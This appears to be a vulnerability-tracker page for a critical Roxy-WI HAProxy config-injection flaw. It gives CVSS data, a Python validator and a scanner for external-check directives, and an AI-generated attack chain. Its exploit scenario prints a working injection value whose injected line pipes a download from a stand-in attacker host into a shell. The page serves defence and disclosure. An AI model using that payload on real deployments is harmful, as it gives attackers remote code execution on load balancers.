Roxy-WI CVE-2026-45558 | EUVD-2026-36039
Severity: CRITICAL, CVSS 3.1 base score 9.9 (NVD)
Weakness: Improper Input Validation (CWE-20)
Published: 2026-06-10, source: GitHub_M

Severity by source

NVD PRIMARY
9.9 CRITICAL
AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Primary rating from NVD · only source for this CVE.

CVSS Vector (NVD)

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Changed
Confidentiality: High
Integrity: High
Availability: High

Lifecycle Timeline

CVE Published: Jun 10, 2026 - 14:01 (nvd), rated CRITICAL 9.9
Analysis Generated: Jun 10, 2026 - 15:16 (vuln.today)

Description (NVD)

Roxy-WI is a web interface for managing Haproxy, Nginx, Apache and Keepalived servers. In versions 8.2.6.4 and prior, the HAProxy section-save endpoints (POST /api/service/haproxy/<server_id>/section/<section_type> and the PUT / global / defaults variants) accept a JSON option field that is not validated, not escaped, and is rendered verbatim into the generated HAProxy configuration via the section.j2, global.j2, and defaults.j2 Ansible templates. Because Roxy-WI then pushes the generated config to the load balancer and runs systemctl reload haproxy, an authenticated user with role ≤ 3 (user) can inject arbitrary HAProxy directives into the config that runs on every load balancer their group manages - including option external-check + external-check command /bin/bash -c '…', which gives remote code execution on the load balancer as the haproxy user on every health-check tick. At time of publication, there are no publicly available patches.
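The defect described above is a classic template-injection-into-config problem: a JSON value is pasted into a line-oriented configuration file where a line break, or the wrong keyword, becomes a new directive. The following Python is an added example for illustration, not Roxy-WI's code or its section.j2 template. It shows a rendering function that mirrors the verbatim-paste pattern the advisory describes, a hardened variant that validates the option field first (the allow-list of keywords and the character set are constructed assumptions, not Roxy-WI's accepted set), and a small scanner defenders can run over an already-generated haproxy.cfg to find directives that spawn external programs.

```python
import re
from typing import List, Tuple

# Constructed allow-list of "option" keywords a low-privilege user may set.
# Roxy-WI's real accepted set is not documented on the page; adjust to policy.
ALLOWED_OPTION_KEYWORDS = frozenset({
    "httpchk", "tcp-check", "httplog", "tcplog", "dontlognull",
    "forwardfor", "http-server-close", "redispatch", "log-health-checks",
})

# haproxy.cfg is one directive per line, so any control character (CR, LF,
# NUL, tab) in a value can start a new directive after rendering.
_CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")
# Conservative charset for option arguments (HTTP methods, paths, hosts).
_SAFE_VALUE = re.compile(r"^[A-Za-z0-9._/:\-= ]+$")


class OptionValidationError(ValueError):
    """Raised when the submitted option field must not reach the template."""


def validate_option(value: object) -> str:
    """Return a normalized option value or raise OptionValidationError."""
    if not isinstance(value, str):
        raise OptionValidationError("option must be a string")
    if _CONTROL_CHARS.search(value):
        raise OptionValidationError("option contains control characters")
    if not _SAFE_VALUE.fullmatch(value):
        raise OptionValidationError("option contains disallowed characters")
    tokens = value.split()
    if not tokens:
        raise OptionValidationError("option is empty")
    if tokens[0] not in ALLOWED_OPTION_KEYWORDS:
        raise OptionValidationError(f"option keyword not allowed: {tokens[0]}")
    # Collapse whitespace so the rendered line is exactly one directive.
    return " ".join(tokens)


def option_is_accepted(value: object) -> bool:
    """Convenience predicate for tests and request handlers."""
    try:
        validate_option(value)
        return True
    except OptionValidationError:
        return False


def render_backend_section_unsafe(name: str, option: str) -> str:
    """Mirrors the pattern the advisory describes: value pasted verbatim.

    Kept only to show why a newline in `option` yields extra directives.
    """
    return f"backend {name}\n    option {option}\n"


def render_backend_section(name: str, option: str) -> str:
    """Hardened variant: the value is validated before it touches the template."""
    return f"backend {name}\n    option {validate_option(option)}\n"


# Directives that run external programs on health-check ticks; these should
# never originate from user-submitted fields.
_RISKY_DIRECTIVES = re.compile(r"^\s*(option\s+external-check|external-check)\b")


def find_risky_directives(cfg_text: str) -> List[Tuple[int, str]]:
    """Return (line_number, stripped_line) for each external-check directive."""
    hits: List[Tuple[int, str]] = []
    for lineno, line in enumerate(cfg_text.splitlines(), start=1):
        if _RISKY_DIRECTIVES.match(line):
            hits.append((lineno, line.strip()))
    return hits


# Constructed sample haproxy.cfg for the scanner; not a real deployment.
SAMPLE_CFG = """\
global
    log /dev/log local0
defaults
    mode http
backend app
    option httpchk GET /health
    option external-check
    external-check command /usr/local/bin/check.sh
    server app1 10.0.0.10:8080 check
"""

if __name__ == "__main__":
    print(render_backend_section("app", "httpchk GET /health"), end="")
    for lineno, line in find_risky_directives(SAMPLE_CFG):
        print(f"line {lineno}: {line}")
```

Usage note: the scanner is the cheaper control to deploy first, because it needs no code change in Roxy-WI; run it against the haproxy.cfg on each managed load balancer when inventorying deployments, and treat any hit that was not placed there by an administrator as an indicator to investigate. The validator belongs in the section-save handler before any template is rendered; escaping inside the Jinja template is not a substitute, since HAProxy has no quoting that neutralizes a line break.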

Analysis (AI)

Remote code execution in Roxy-WI versions 8.2.6.4 and prior allows authenticated low-privilege users (role ≤ 3) to inject arbitrary HAProxy directives via unvalidated JSON option fields in the HAProxy section-save API endpoints, achieving command execution as the haproxy user on every managed load balancer. No public exploit has been identified at time of analysis, but the attack is straightforward given the documented injection path through the section.j2, global.j2, and defaults.j2 Ansible templates, and no vendor-released patch is available.


Attack Chain (AI-derived)

Hypothetical attack flow derived from CVE metadata:

Recon: Obtain role ≤ 3 Roxy-WI credentials
Delivery: Identify accessible HAProxy server group
Exploit: POST crafted option field to section-save endpoint
Install: Roxy-WI renders payload into haproxy.cfg via Ansible template
C2: systemctl reload haproxy applies injected external-check command
Execute: Shell executes as haproxy user on each health-check tick
Impact: Establish persistence and pivot from load balancer

Vulnerability Assessment (AI)

Exploitation: Requires an authenticated Roxy-WI account with role ≤ 3 ('user' role) that has access to at least one HAProxy server group, and network reachability to the Roxy-WI API (typically the management web interface). … Additional conditions and limiting factors are described in the full assessment.

Risk Assessment: The CVSS 9.9 score (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H) accurately reflects high real-world risk: network-reachable, low complexity, only a low-privileged role-3 'user' account is required, no user interaction is needed, and the scope change captures the pivot from the Roxy-WI application to the underlying load balancer host. … Full risk analysis with EPSS, KEV, and SSVC signal comparison is in the full report.

Exploit Scenario: An attacker with any role-3 user account (e.g., a low-privilege internal user, a compromised credential, or a tenant on a shared Roxy-WI instance) sends a crafted POST to /api/service/haproxy/<server_id>/section/<section_type> with an option field containing 'external-check\n external-check command /bin/bash -c "curl attacker.tld/sh|sh"'. Roxy-WI renders this verbatim into the HAProxy config via the Ansible template, pushes it to the load balancer, and runs systemctl reload haproxy; the injected shell command then executes as the haproxy user on every health-check tick, giving the attacker persistent code execution on every load balancer in the victim's group. …

Remediation: No vendor-released patch is identified at time of analysis; the GHSA-w2x4-66jj-3597 advisory explicitly states that no public patches exist. … Detailed patch versions, workarounds, and compensating controls are in the full report.

Recommended Action (AI)

Within 24 hours: Inventory all Roxy-WI deployments and current version numbers; audit which users have low-privilege roles (≤3) with API access; implement immediate network access controls restricting API calls to section-save endpoints to trusted administrator sources only. …
